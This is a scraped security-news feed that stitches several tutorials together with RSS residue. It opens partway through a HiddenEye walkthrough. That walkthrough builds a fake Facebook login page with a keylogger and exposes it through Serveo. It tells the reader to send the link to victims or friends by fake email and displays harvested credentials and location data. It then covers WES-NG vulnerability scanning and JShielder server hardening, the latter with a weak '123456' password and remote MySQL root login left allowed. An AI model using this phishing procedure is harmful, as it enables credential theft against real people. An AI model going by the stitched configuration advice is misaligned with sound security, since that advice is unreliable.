 [9] Snapchat        [18] Origin         [27] DevianArt
HiddenEye >>>
  • Type 3
 [*] SELECT ANY ONE MODE…
 Operation mode:
  [1] Standard Page Phishing
  [2] Advanced Phishing-Poll Ranking Method(Poll_mode/login_with)
  [3] Facebook Phishing- Fake Security issue(security_mode)
  [4] Facebook Phising-Messenger Credentials(messenger_mode)
 HiddenEye >>> 3
  • Type Y
        _  _ . ___  ___  ___ _  _  ___ _  _ ___
        |__| | ]  | ]  | |__ |\ |  |__ \__/ |__
        |  | | ]__| ]__| |__ | \|  |__  ||  |__
        https://github.com/darksecdevelopers
        ** BY: DARKSEC **
-------------------------------
[ KEYLOGGER PROMPT ]!!
-------------------------------
[*]DO YOU WANT TO ADD A KEYLOGGER IN PHISHING PAGE-(Y/N)
 YOUR CHOICE >>> Y
  • Type www.facebook.com
        _  _ . ___  ___  ___ _  _  ___ _  _ ___
        |__| | ]  | ]  | |__ |\ |  |__ \__/ |__
        |  | | ]__| ]__| |__ | \|  |__  ||  |__
        https://github.com/darksecdevelopers
        ** BY:DARKSEC **

-------------------------------
[ PUT YOUR REDIRECTING URL HERE ]
-------------------------------
**(Choose Wisely As Your Victim Will Redirect to This Link)

**(Do not leave it blank. Unless Errors may occur)

[*]Insert a custom redirect url:

REDIRECT HERE>>> www.facebook.com
  • Type 443
[ WEBSERVER PORT SELECTION ]!!
 [*]Select Any Available Port [1-65535]:
 HiddenEye >>> 443
  • Type 2
[ HOST SERVER SELECTION ]!!
[!](SERVEO WORKS BETTER)
[*]Select Any Available Server:
[1]Ngrok
[2]Serveo
 HiddenEye >>> 2
  • Type 2
[ SERVEO URL TYPE SELECTION ]!!
 [!]REMEMBER ? Serveo Don't Allows Phishing.
 [!]They Drops The Connection Whenever Detects Phishing.
 [*]CHOOSE ANY SERVEO URL TYPE TO GENERATE PHISHING LINK:
 [1]Custom URL (Generates designed url)
 [2]Random URL (Generates Random url)
 YOUR CHOICE >>> 2

 [ RANDOM SERVEO URL ]!!
 [!] SEND THIS SERVEO URL TO VICTIMS-
 [] Localhost URL: https://127.0.0.1:443 
 [] SERVEO URL: https://viduo.serveo.net
 ……………………………………………………………….
 [!] IF FOUND SEGMENTATION FAULT, IT MEANS THE SERVER FAILED.            |
 [!] THEN YOU HAVE TO RUN IT AGAIN.                                      |
 [!] Use This Command In Another Terminal.                               |
 (cd Server/www/ && php -S 127.0.0.1:443 > /dev/null)                   |
 ……………………………………………………………….
 [*] Waiting For Victim Interaction. Keep Eyes On Requests Coming From Victim …
 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  • Open another terminal & go to the location below: cd /home/iicybersecurity/HiddenEye/Server/www/ && php -S 127.0.0.1:443 > /dev/null
root@ubuntu:/home/iicybersecurity/HiddenEye# cd Server/www/ && php -S 127.0.0.1:443 > /dev/null
[Fri Aug 2 03:55:35 2019] 127.0.0.1:37156 [200]: /keylogger.php?c=
[Fri Aug 2 03:55:36 2019] 127.0.0.1:37158 [200]: /keylogger.php?c= 
[Fri Aug 2 03:55:37 2019] 127.0.0.1:37160 [200]: /keylogger.php?c= 
[Fri Aug 2 03:55:38 2019] 127.0.0.1:37162 [200]: /keylogger.php?c= 
[Fri Aug 2 03:55:39 2019] 127.0.0.1:37164 [200]: /keylogger.php?c= 
[Fri Aug 2 03:55:40 2019] 127.0.0.1:37166 [200]: /keylogger.php?c= 
[Fri Aug 2 03:55:41 2019] 127.0.0.1:37168 [200]: /keylogger.php?c= 
[Fri Aug 2 03:55:42 2019] 127.0.0.1:37170 [200]: /keylogger.php?c= 
[Fri Aug 2 03:55:43 2019] 127.0.0.1:37172 [200]: /keylogger.php?c= 
[Fri Aug 2 03:55:44 2019] 127.0.0.1:37174 [200]: /keylogger.php?c= 
  • When you open https://127.0.0.1:443 in your web browser, you will see the victim interaction on the machine where you started the server.
  • Enter a username & password.
  • To send the fake page to your friends, you can send them a fake email containing the generated public URL, in this case https://viduo.serveo.net. You can also test with the loopback URL on the Ubuntu machine, https://127.0.0.1:443
  • After entering the username & password, you will find the login credentials in the terminal where you started HiddenEye.py
…………………………………………………………
  [ CREDENTIALS FOUND ]:
 …………………………………………………………
[EMAIL]; meetmichael@gmail.com [PASS]: michael@12345
 …………………………………………………………
 [ VICTIM INFO FOUND ]:
  Victim Public IP: 220.59.157.158
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36
 Current logged in user: root
 Longitude: 79.0005 
 Latitude: 22.6000
 ISP: AS17813 
 Country: IN
 Region: Delhi 
 City: Delhi
 …………………………………………………………
 ………………………….
 ………………………….

All-New Windows Exploit Suggester is here, WES-NG https://www.securitynewspaper.com/2019/07/25/windows-exploit-suggester-is-here/ Thu, 25 Jul 2019 19:55:36 +0000 https://www.securitynewspaper.com/?p=15892

Windows is the most popular operating system because of its easy usability and easy-to-understand features. Its wide usage also makes it a bigger target: according to ethical hacking researchers at the International Institute of Cyber Security, Windows has many vulnerabilities, which raises the question of whether Windows is secure or not. Today we will show a Python script designed to find those vulnerabilities.

WES-NG (Windows Exploit Suggester) is a tool that works from the output of the Windows systeminfo utility. It provides a list of vulnerabilities, including known exploits, for the Windows OS. All Windows versions, including Windows Server versions, are supported.

  • For testing we will use Windows 10 1809 64 Bit. Make sure that Windows is configured with Python 3.
  • To install Python go to: https://www.python.org/downloads/
  • After downloading, install Python for all users. If the Python path is not set automatically, set the path in the Windows environment variables.
  • Go to My Computer > Properties > Advanced > Environment Variables > System Variables
  • Click on New, in Variable type Path, then enter the Value C:\Program Files (x86)\Python37-32\Scripts\
  • Type python --version to confirm the installation.
  • After configuring Python, download WES-NG from: https://github.com/bitsadmin/wesng
  • After downloading, unzip WES-NG. Then open CMD (Command Prompt) as administrator.
  • Go to the location where you downloaded & unzipped WES-NG.
  • Then open another CMD as administrator & gather the system configuration. For that, type systeminfo.exe
  • Save the system info into a text file. Type systeminfo > systeminfo.txt
  • A new text file will be created. Copy systeminfo.txt into the wesng-master folder.
  • Then execute wes.py systeminfo.txt
  • Now wes-ng will start finding vulnerabilities on the basis of the system information.
  • The screenshots above show 116 vulnerabilities for Windows 1809. We have posted some of them to show how the tool works. Such tools are commonly used by ethical hacking researchers.
  • If you open any vulnerability, for example the last one, CVE 2019-1081, you will see that wes-ng finds the vulnerability in both CVE and exploitdb records.
  • The entry above shows the information disclosure vulnerability in which Microsoft browsers improperly handle objects in memory.
  • Wes-ng updates its list of definitions from https://raw.githubusercontent.com/bitsadmin/wesng/master/definitions.zip to show the CVEs and exploits for the given operating system.
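The core of what WES-NG does in the run above is read the systeminfo output, pick out the build number and the installed hotfixes, and compare them with its definitions. The following is an added example (not code from the WES-NG project) that parses a constructed systeminfo dump the same way and reports which KBs from an assumed baseline are missing; the KB numbers are placeholders, not real Microsoft updates.

```python
"""Parse `systeminfo` output and report missing hotfixes.

Added example for this article; it is not code from the WES-NG project.
SAMPLE_SYSTEMINFO is a constructed dump and the KB numbers in
EXPECTED_KBS_BY_BUILD are placeholders, not real Microsoft updates.
"""
import re

# Constructed sample of `systeminfo` output (only the fields that matter here).
SAMPLE_SYSTEMINFO = """\
Host Name:                 DESKTOP-TEST
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.17763 N/A Build 17763
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB1000001
                           [02]: KB1000002
                           [03]: KB1000003
Network Card(s):           1 NIC(s) Installed.
"""

# Placeholder baseline: KBs expected on a given build. A real tool loads this
# from a definitions file (WES-NG fetches definitions.zip, see above).
EXPECTED_KBS_BY_BUILD = {
    "17763": ["KB1000002", "KB1000003", "KB1000004"],
}

# Hotfix lines look like "[01]: KB1000001"; the build is in "OS Version".
HOTFIX_RE = re.compile(r"\[\d+\]:\s*(KB\d+)", re.IGNORECASE)
BUILD_RE = re.compile(r"Build\s+(\d+)")


def parse_systeminfo(text):
    """Return (os_name, build_number, installed_kbs) from systeminfo text."""
    os_name, build = None, None
    installed = set()
    for line in text.splitlines():
        if line.startswith("OS Name:"):
            os_name = line.split(":", 1)[1].strip()
        elif line.startswith("OS Version:"):
            m = BUILD_RE.search(line)
            build = m.group(1) if m else None
        m = HOTFIX_RE.search(line)
        if m:
            installed.add(m.group(1).upper())
    return os_name, build, installed


def missing_hotfixes(text, expected=EXPECTED_KBS_BY_BUILD):
    """Return the sorted list of expected KBs that the host lacks.

    Raises ValueError when the build cannot be determined or is not in the
    baseline, so an unknown host is never silently reported as fully patched.
    """
    _, build, installed = parse_systeminfo(text)
    if build is None or build not in expected:
        raise ValueError("no baseline for build %r" % build)
    return sorted(kb for kb in expected[build] if kb not in installed)


if __name__ == "__main__":
    name, build, kbs = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print("%s (build %s): %d hotfixes installed" % (name, build, len(kbs)))
    for kb in missing_hotfixes(SAMPLE_SYSTEMINFO):
        print("missing:", kb)
```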


]]>
How to Secure any Linux Server | Automated Server Hardening script https://www.securitynewspaper.com/2019/07/18/how-to-secure-any-linux-server-automated-server-hardening-script/ Thu, 18 Jul 2019 20:33:17 +0000 https://www.securitynewspaper.com/?p=16068 There are many open source developers who want to show their skills by developing web applications. Every developer tries to show something new. Or some developers try to automate theirRead More →

The post How to Secure any Linux Server | Automated Server Hardening script appeared first on Information Security Newspaper | Hacking News.

]]>
There are many open source developers who want to show their skills by developing web applications. Every developer tries to show something new, or tries to automate their tasks. According to ethical hacking researchers at the International Institute of Cyber Security, there are many phases between developing a web application and deploying it, and infrastructure security should always be the top priority. Every developer checks their application against external attacks, but the development phase itself should also be done securely, and web applications should be developed securely. We will show a script that is used to secure, or harden, any Linux server or local web server on which developers will deploy their website.

LAMP

LAMP is an open source software bundle used for creating web applications. LAMP is also referred to as the LAMP stack because it consists of four layers.

LAMP stands for Linux, Apache, MySQL and PHP. Many developers use LAMP to develop & deploy web applications. JShielder is used to secure the Linux servers on which developers want to deploy their web applications. JShielder automates the process of installing the packages required to host web applications. In other words, JShielder acts as a server hardening tool (server hardening is the process of enhancing server security). Some common server hardening measures include:-

  • Data Encryption for communication.
  • Replacing protocols that send important information in plain text.
  • Closes unnecessary services running on server.
  • Keep OS up to date, specially the security patches & malware removal tools.
  • Regularly update security policies.
  • Maintains & regularly checks the server logs.

JShielder performs the following configuration steps:-

  • Configures a Hostname
  • Reconfigures the Timezone
  • Updates the entire System
  • Creates a New Admin user so you can manage your server safely without the need of doing remote connections with root.
  • Helps the user generate secure RSA keys, so that remote access to your server is done exclusively from your local PC and no conventional password is used
  • Configures, Optimize and secures the SSH Server (Some Settings Following CIS Benchmark)
  • Configures IPTABLES Rules to protect the server from common attacks
  • Disables unused FileSystems and Network protocols
  • Protects the server against Brute Force attacks by installing and configuring fail2ban
  • Installs and Configure Artillery as a Honeypot, Monitoring, Blocking and Alerting tool
  • Installs PortSentry
  • Install, configure, and optimize MySQL
  • Install the Apache Web Server
  • Install, configure and secure PHP
  • Secure Apache via configuration file and with installation of the Modules ModSecurity, ModEvasive, Qos and SpamHaus
  • Secures NginX with the Installation of ModSecurity NginX module
  • Installs RootKit Hunter
  • Secures Root Home and Grub Configuration Files
  • Installs Unhide to help Detect Malicious Hidden Processes
  • Installs Tiger, A Security Auditing and Intrusion Prevention system
  • Restrict Access to Apache Config Files
  • Disables Compilers
  • Creates Daily Cron job for System Updates
  • Kernel Hardening via sysctl configuration File (Tweaked)
  • /tmp Directory Hardening
  • PSAD IDS installation
  • Enables Process Accounting
  • Enables Unattended Upgrades
  • MOTD and Banners for Unauthorized access
  • Disables USB Support for Improved Security (Optional)
  • Configures a Restrictive Default UMASK
  • Configures and enables Auditd
  • Configures Auditd rules following CIS Benchmark
  • Sysstat install
  • ArpWatch install
  • Additional Hardening steps following CIS Benchmark
  • Secures Cron
  • Automates the process of setting a GRUB Bootloader Password
  • Secures Boot Settings
  • Sets Secure File Permissions for Critical System Files

According to ethical hacking researchers at the International Institute of Cyber Security, all of the above points are needed by network administrators to secure their servers.
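A script like JShielder applies these controls, but an administrator still wants to verify that they are in place afterwards. The following added example (not part of the JShielder project) audits three of the checklist items above from configuration text: CIS-style sshd_config directives, filesystem modules disabled through modprobe.d, and the restrictive UMASK. The baseline values and the sample configuration snippets are assumptions constructed for the example; adjust the baseline to your own policy.

```python
"""Audit a few of the hardening controls from the checklist above.

Added example for this article, not part of the JShielder project. The
baseline values and the sample configuration text are constructed
assumptions (CIS-style SSH directives, UMASK 027, unused filesystems).
"""
import re

# Assumed baseline for /etc/ssh/sshd_config; sshd directive names are
# case-insensitive, and values are compared case-insensitively too.
EXPECTED_SSHD = {
    "PermitRootLogin": "no",
    "PasswordAuthentication": "no",
    "X11Forwarding": "no",
    "MaxAuthTries": "4",
    "IgnoreRhosts": "yes",
}

# Filesystem modules a hardening script typically disables in modprobe.d.
UNUSED_FS = ["cramfs", "freevxfs", "jffs2", "hfs", "hfsplus", "udf"]

# Constructed sample inputs: one deviation of each kind is planted.
SAMPLE_SSHD_CONFIG = """\
# sshd_config after hardening (constructed sample)
Port 22
PermitRootLogin yes
PasswordAuthentication no
# duplicated on purpose: sshd honours only the first occurrence
PasswordAuthentication yes
X11Forwarding no
MaxAuthTries 4
"""
SAMPLE_MODPROBE = """\
install cramfs /bin/true
install freevxfs /bin/true
install jffs2 /bin/true
install hfs /bin/true
install hfsplus /bin/true
"""
SAMPLE_PROFILE = "# /etc/profile (constructed sample)\numask 022\n"


def _strip(line):
    """Drop comments and surrounding whitespace from a config line."""
    return line.split("#", 1)[0].strip()


def parse_sshd_config(text):
    """Return {lowercased directive: value}; like sshd, the first match wins."""
    settings = {}
    for raw in text.splitlines():
        line = _strip(raw)
        if not line:
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        if len(parts) == 2:
            settings.setdefault(parts[0].lower(), parts[1].strip())
    return settings


def audit_sshd(text, expected=EXPECTED_SSHD):
    """Return [(directive, wanted, actual)] for every deviation; [] when clean."""
    actual = parse_sshd_config(text)
    findings = []
    for directive, wanted in expected.items():
        got = actual.get(directive.lower())
        if got is None or got.lower() != wanted.lower():
            findings.append((directive, wanted, got))
    return findings


def audit_modprobe(text, unused=UNUSED_FS):
    """Return the filesystems from `unused` that modprobe.d does not disable.

    A module counts as disabled when an `install <module> /bin/true` (or
    /bin/false) line is present, the usual CIS-recommended technique.
    """
    disabled = set()
    for raw in text.splitlines():
        m = re.match(r"install\s+(\S+)\s+/bin/(true|false)$", _strip(raw))
        if m:
            disabled.add(m.group(1))
    return [fs for fs in unused if fs not in disabled]


def find_umask(text):
    """Return the last umask set in a profile or login.defs text, or None.

    Matches both `umask 027` (shell profiles) and `UMASK 027` (login.defs).
    """
    found = None
    for raw in text.splitlines():
        m = re.match(r"umask\s+(\d{3,4})$", _strip(raw), re.IGNORECASE)
        if m:
            found = m.group(1)  # the last assignment wins in a shell profile
    return found


def umask_ok(text, wanted="027"):
    """True when the configured umask is at least as restrictive as `wanted`."""
    found = find_umask(text)
    if found is None:
        return False
    # Every permission bit that `wanted` clears must also be cleared by `found`.
    return int(found, 8) & int(wanted, 8) == int(wanted, 8)


if __name__ == "__main__":
    for directive, wanted, got in audit_sshd(SAMPLE_SSHD_CONFIG):
        print("sshd: %s should be %s, found %s" % (directive, wanted, got))
    for fs in audit_modprobe(SAMPLE_MODPROBE):
        print("modprobe: %s is not disabled" % fs)
    print("umask ok:", umask_ok(SAMPLE_PROFILE))
```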

JShielder Installation :-

  • For testing we will use Ubuntu 18.04 LTS. Before using JShielder, LAMP must be installed & configured on your Linux system. LAMP is the Linux counterpart of XAMPP, which is mostly used on Windows OS.
  • To install LAMP, open a terminal and type sudo apt-get update. To install MySQL, type sudo apt-get install mysql-server mysql-client
root@ubuntu:/home/iicybersecurity# sudo apt-get update
 Hit:1 https://security.ubuntu.com/ubuntu bionic-security InRelease
 Hit:2 https://us.archive.ubuntu.com/ubuntu bionic InRelease
 Hit:3 https://us.archive.ubuntu.com/ubuntu bionic-updates InRelease
 Hit:4 https://us.archive.ubuntu.com/ubuntu bionic-backports InRelease
 Reading package lists… Done
root@ubuntu:/home/iicybersecurity# sudo apt-get install mysql-server
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 The following additional packages will be installed:
   libaio1 libevent-core-2.1-6 libhtml-template-perl mysql-client-5.7 mysql-client-core-5.7 mysql-server-5.7
   mysql-server-core-5.7
 Suggested packages:
   libipc-sharedcache-perl mailx tinyca
 The following NEW packages will be installed:
   libaio1 libevent-core-2.1-6 libhtml-template-perl mysql-client-5.7 mysql-client-core-5.7 mysql-server mysql-server-5.7
   mysql-server-core-5.7
  • For installing apache type sudo apt-get install apache2 apache2-doc apache2-utils libexpat1 ssl-cert
root@ubuntu:/home/iicybersecurity# sudo apt-get install apache2 apache2-doc apache2-utils libexpat1 ssl-cert
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 ssl-cert is already the newest version (1.0.39).
 libexpat1 is already the newest version (2.2.5-3ubuntu0.1).
 The following additional packages will be installed:
   apache2-bin apache2-data libapr1 libaprutil1 libaprutil1-dbd-sqlite3 libaprutil1-ldap liblua5.2-0
 Suggested packages:
   apache2-suexec-pristine | apache2-suexec-custom
 The following NEW packages will be installed:
   apache2 apache2-bin apache2-data apache2-doc apache2-utils libapr1 libaprutil1 libaprutil1-dbd-sqlite3
   libaprutil1-ldap liblua5.2-0
  • To install PHP type sudo apt-get install php && sudo apt-get install phpmyadmin. This command will ask you to reconfigure the web server: select apache, and it will then ask you to configure a password for MySQL. Enter a secure password & all the dependencies will be configured. The password should be highly secure, as is always communicated in the day one class of the International Institute of Cyber Security (IICS, iiCyberSecurity).
root@ubuntu:/home/iicybersecurity# sudo apt-get install php
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 The following additional packages will be installed:
   libapache2-mod-php7.2 php-common php7.2 php7.2-cli php7.2-common php7.2-json php7.2-opcache php7.2-readline
 Suggested packages:
   php-pear
 The following NEW packages will be installed:
   libapache2-mod-php7.2 php php-common php7.2 php7.2-cli php7.2-common php7.2-json php7.2-opcache php7.2-readline
 0 upgraded, 9 newly installed, 0 to remove and 387 not upgraded.
 Need to get 3,863 kB of archives.
root@ubuntu:/home/iicybersecurity# sudo apt-get install phpmyadmin
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 The following additional packages will be installed:
   dbconfig-common dbconfig-mysql libjs-sphinxdoc libzip4 php-bz2 php-curl php-gd php-mbstring php-mysql php-pear
   php-php-gettext php-phpseclib php-tcpdf php-xml php-zip php7.2-bz2 php7.2-curl php7.2-gd php7.2-mbstring php7.2-mysql
   php7.2-xml php7.2-zip
 Suggested packages:
   php-libsodium php-mcrypt php-gmp php-imagick
 The following NEW packages will be installed:
   dbconfig-common dbconfig-mysql libjs-sphinxdoc libzip4 php-bz2 php-curl php-gd php-mbstring php-mysql php-pear
   php-php-gettext php-phpseclib php-tcpdf php-xml php-zip php7.2-bz2 php7.2-curl php7.2-gd php7.2-mbstring php7.2-mysql
   php7.2-xml php7.2-zip phpmyadmin
  • Now type git clone https://github.com/Jsitech/JShielder.git
root@ubuntu:/home/iicybersecurity/Downloads# git clone https://github.com/Jsitech/JShielder.git
 Cloning into 'JShielder'…
 remote: Enumerating objects: 70, done.
 remote: Counting objects: 100% (70/70), done.
 remote: Compressing objects: 100% (44/44), done.
 remote: Total 1192 (delta 48), reused 46 (delta 26), pack-reused 1122
 Receiving objects: 100% (1192/1192), 1.09 MiB | 764.00 KiB/s, done.
 Resolving deltas: 100% (624/624), done.
  • Then type cd JShielder && ls. JShielder is developed as a bash script.
root@ubuntu:/home/iicybersecurity# cd Downloads/JShielder/
root@ubuntu:/home/iicybersecurity/Downloads/JShielder# ls
 'CentOS_7(Under Development)'   jshielder.sh   LICENSE   README.md   UbuntuServer_16.04LTS   UbuntuServer_18.04LTS
  • Type ./jshielder.sh
root@myserver1:/home/iicybersecurity/Downloads/JShielder# ./jshielder.sh
     ██╗███████╗██╗  ██╗██╗███████╗██╗     ██████╗ ███████╗██████╗
     ██║██╔════╝██║  ██║██║██╔════╝██║     ██╔══██╗██╔════╝██╔══██╗
     ██║███████╗███████║██║█████╗  ██║     ██║  ██║█████╗  ██████╔╝
██   ██║╚════██║██╔══██║██║██╔══╝  ██║     ██║  ██║██╔══╝  ██╔══██╗
╚█████╔╝███████║██║  ██║██║███████╗███████╗██████╔╝███████╗██║  ██║
╚════╝ ╚══════╝╚═╝  ╚═╝╚═╝╚══════╝╚══════╝╚═════╝ ╚══════╝╚═╝  ╚═╝

Automated Hardening Script for Linux Servers
Developed By Jason Soto @JsiTech
---------------------------------------------------------------------------------------------------------
[+] SELECT YOUR LINUX DISTRIBUTION
---------------------------------------------------------------------------------------------------------

1. Ubuntu Server 16.04 LTS
2. Ubuntu Server 18.04 LTS
3. Linux CentOS 7 (Coming Soon)
4. Debian GNU/Linux 8 (Coming Soon)
5. Debian GNU/Linux 9 (Coming Soon)
6. Red Hat Linux 7 (Coming Soon)
7. Exit

2
  • Type 2
[+] SELECT THE DESIRED OPTION
1. LAMP Deployment
2. LEMP Deployment
3. Reverse Proxy Deployment With Apache
4. Running With SecureWPDeployer or JSDeployer Script
5. Customized Run (Only run desired Options)
6. CIS Benchmark Hardening
Exit
 
1
  • Type 1
[+] Setting some Prerequisites
 [ +++++++++++++++++++++++++++++++++++++++++++++++++++++   ]'universe' distribution component is already enabled for all sources.
 Done.
  To EXIT Press x Key, Press ENTER to Continue
  • It then reports that the 'universe' distribution component is enabled. Press Enter to continue the configuration.
  • Enter y & type mysql1 as the server name.
  • Then enter www.testsite1.com as the domain name.
¿Do you Wish to Set a HostName? (y/n): y
Type a Name to Identify this server :
  (For Example: myserver): mysql1
¿Type Domain Name?:www.testsite1.com

Creating legal Banners for unauthorized access
 [ +++++++++++++++++++++++++++++++++++++++++++++++++++++   ]OK
 Done.
  To EXIT Press x Key, Press ENTER to Continue
  • Then configure timezone.
[+] We will now Configure the TimeZone
 Current default time zone: 'America/Los_Angeles'
  • Then select country.
[+] We will now Configure the TimeZone
 Current default time zone: 'America/Los_Angeles'
 Local time is now:      Wed Jul 17 22:31:34 PDT 2019.
 Universal Time is now:  Thu Jul 18 05:31:34 UTC 2019.
 Done.

  To EXIT Press x Key, Press ENTER to Continue
  • Then the server will run an update. This step searches for available updates for the system & installs the required ones.
  • It might take time depending on your internet speed.
[+] Updating the System
 Hit:1 https://security.ubuntu.com/ubuntu bionic-security InRelease
 Hit:2 https://us.archive.ubuntu.com/ubuntu bionic InRelease
 Hit:3 https://us.archive.ubuntu.com/ubuntu bionic-updates InRelease
 Hit:4 https://us.archive.ubuntu.com/ubuntu bionic-backports InRelease
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 387 packages can be upgraded. Run 'apt list --upgradable' to see them.
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 Calculating upgrade… Done
 The following package was automatically installed and is no longer required:
   libllvm7
 Use 'sudo apt autoremove' to remove it.
 The following NEW packages will be installed:
   gstreamer1.0-gtk3 libllvm8 linux-headers-4.18.0-25 linux-headers-4.18.0-25-generic linux-image-4.18.0-25-generic
   linux-modules-4.18.0-25-generic linux-modules-extra-4.18.0-25-generic python3-dateutil
 The following packages will be upgraded:

apport apport-gtk apt apt-utils aptdaemon aptdaemon-data bash bind9-host binutils binutils-common
   binutils-x86-64-linux-gnu busybox-initramfs busybox-static bzip2 console-setup console-setup-linux cpp cups

Done.
  To EXIT Press x Key, Press ENTER to Continue
  • After installing updates press enter.
 [+] Setting UMASK to a more Restrictive Value (027)
 [ ++++++++++++++++++++++++++++++++++++++++++++++++++++++  ]
 OK
 Done.
  To EXIT Press x Key, Press ENTER to Continue
  • Now JShielder will enhance security by blocking or disabling unnecessary components of system.
 [+] Disabling Unused FileSystems
 [ ++++++++++++++++++++++++++++++++++++++++++++++++++++++  ] OK
 Done.
  To EXIT Press x Key, Press ENTER to Continue
  • Now JShielder will disable uncommon network protocols, which reduces what external scanning, such as the reconnaissance phase of a pentest, can reach.
[+] Disabling Uncommon Network Protocols
 [ ++++++++++++++++++++++++++++++++++++++++++++++++++++++  ] OK
 Done.
  To EXIT Press x Key, Press ENTER to Continue
  • Create a new user. Enter a username & password.
  • Enter username testuser1 & password 123456
  • Enter y
[+] We will now Create a New User
Type the new username: testuser1
 Adding user `testuser1' ...
 Adding new group `testuser1' (1001) ...
 Adding new user `testuser1' (1001) with group `testuser1' ...
 Creating home directory `/home/testuser1' ...
 Copying files from `/etc/skel' ...
Enter new UNIX password:
Retype new UNIX password:
 passwd: password updated successfully
 Changing the user information for testuser1
 Enter the new value, or press ENTER for the default
        Full Name []:
        Room Number []:     
        Work Phone []:     
        Home Phone   []:     
        Other []:
 Is the information correct? [Y/n] y

Done.
  To EXIT Press x Key, Press ENTER to Continue

[+] Instructions to Generate an RSA KEY PAIR
 *** IF YOU DONT HAVE A PUBLIC RSA KEY, GENERATE ONE ***
      Follow the Instruction and Hit Enter When Done
      To receive a new Instruction
 RUN THE FOLLOWING COMMANDS  a) ssh-keygen -t rsa -b 4096
  • Copy & paste the above command into the same terminal & hit Enter.
 ssh-keygen -t rsa -b 4096 

 b) cat /home/testuser1/.ssh/id_rsa.pub >> /home/testuser1/.ssh/authorized_keys
 Done.
  To EXIT Press x Key, Press ENTER to Continue

Run the Following Command to copy the Key
  Press ENTER when done
  ssh-copy-id -i /root/.ssh/id_rsa.pub testuser1@192.168.1.11
 Done.
  To EXIT Press x Key, Press ENTER to Continue


 [+] Securing SSH
 [ ++++++++++++++++++++++++++++++++++++++++++++++++++++++  ]OK
 chattr: No such file or directory while trying to stat /home/testuser1/.ssh/authorized_keys
 Done.
  To EXIT Press x Key, Press ENTER to Continue
  • SSH is now secured. Next it sets the iptables rules and installs Fail2ban, which works as an intrusion prevention system; its main purpose is to protect against brute force attacks.
[+] Setting IPTABLE RULES
 [ +++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]
 Done.
  To EXIT Press x Key, Press ENTER to Continue

[+] Installing Fail2Ban
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 The following package was automatically installed and is no longer required:
   libllvm7
 Use 'sudo apt autoremove' to remove it.
 The following additional packages will be installed:
   liblockfile-bin liblockfile1 lockfile-progs procmail sendmail-base sendmail-bin sendmail-cf sensible-mda
 Suggested packages:
   sendmail-doc rmail logcheck resolvconf sasl2-bin
 The following NEW packages will be installed:
   liblockfile-bin liblockfile1 lockfile-progs procmail sendmail sendmail-base sendmail-bin sendmail-cf sensible-mda
 0 upgraded, 9 newly installed, 0 to remove and 1 not upgraded.
 374 not fully installed or removed.
 Need to get 899 kB of archives.
 After this operation, 4,449 kB of additional disk space will be used.
 Do you want to continue? [Y/n] Y
  • Then it will install python3-pyinotify and whois; enter Y to install these dependencies.
Use 'sudo apt autoremove' to remove it.
 The following additional packages will be installed:
   python3-pyinotify whois
 Suggested packages:
   mailx monit sqlite3 python-pyinotify-doc
 The following NEW packages will be installed:
   fail2ban python3-pyinotify whois
 0 upgraded, 3 newly installed, 0 to remove and 1 not upgraded.
 Need to get 398 kB of archives.
 After this operation, 2,110 kB of additional disk space will be used.
 Do you want to continue? [Y/n] Y
 Get:1 https://us.archive.ubuntu.com/ubuntu bionic/universe amd64 fail2ban all 0.10.2-2 [329 kB]

Created symlink /etc/systemd/system/multi-user.target.wants/fail2ban.service → /lib/systemd/system/fail2ban.service.
 Processing triggers for ureadahead (0.100.0-21) …
 Setting up whois (5.3.0) …
 Processing triggers for systemd (237-3ubuntu10.24) …
 Processing triggers for man-db (2.8.3-2ubuntu0.1) …
 Setting up python3-pyinotify (0.9.6-1) …
 Done.
  To EXIT Press x Key, Press ENTER to Continue
  • Then it will install and secure MySQL.
[+] Installing, Configuring and Optimizing MySQL
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 mysql-server is already the newest version (5.7.26-0ubuntu0.18.04.1).
 The following package was automatically installed and is no longer required:
   libllvm7
 Use 'sudo apt autoremove' to remove it.
 0 upgraded, 0 newly installed, 0 to remove and 1 not upgraded.
 [ +++++++++++++++++++++++++++++++++++++++++++++++++++++++ ] OK
 Securing the MySQL server deployment.

 Connecting to MySQL using a blank password.

 VALIDATE PASSWORD PLUGIN can be used to test passwords
 and improve security. It checks the strength of password
 and allows the users to set only those passwords which are
 secure enough. Would you like to setup VALIDATE PASSWORD plugin?

 Press y|Y for Yes, any other key for No:y
  • Choose the password policy. Enter 1
There are three levels of password validation policy:
 LOW    Length >= 8
 MEDIUM Length >= 8, numeric, mixed case, and special characters
 STRONG Length >= 8, numeric, mixed case, special characters and dictionary                  file
 Please enter 0 = LOW, 1 = MEDIUM and 2 = STRONG: 1

New password:

Re-enter new password:

Estimated strength of the password: 100
 Do you wish to continue with the password provided?(Press y|Y for Yes, any other key for No) :y
  • Enter y to remove the anonymous user, which enhances the security of MySQL by restricting anonymous logins. As per digital forensics experts at iicybersecurity, some DB admins leave anonymous login enabled, which further helps in attacks.
 By default, a MySQL installation has an anonymous user,
 allowing anyone to log into MySQL without having to have
 a user account created for them. This is intended only for
 testing, and to make the installation go a bit smoother.
 You should remove them before moving into a production
 environment.
 Remove anonymous users? (Press y|Y for Yes, any other key for No) :y
  • Whether to allow remote root access depends entirely on your requirements. Here we enter n, which leaves remote root login allowed.
 Normally, root should only be allowed to connect from
 'localhost'. This ensures that someone cannot guess at
 the root password from the network.
 Disallow root login remotely? (Press y|Y for Yes, any other key for No): n 
  • Remove the test user which comes by default in mysql. Enter y
By default, MySQL comes with a database named 'test' that
 anyone can access. This is also intended only for testing,
 and should be removed before moving into a production
 environment.
 Remove test database and access to it? (Press y|Y for Yes, any other key for No) : y

 Dropping test database…
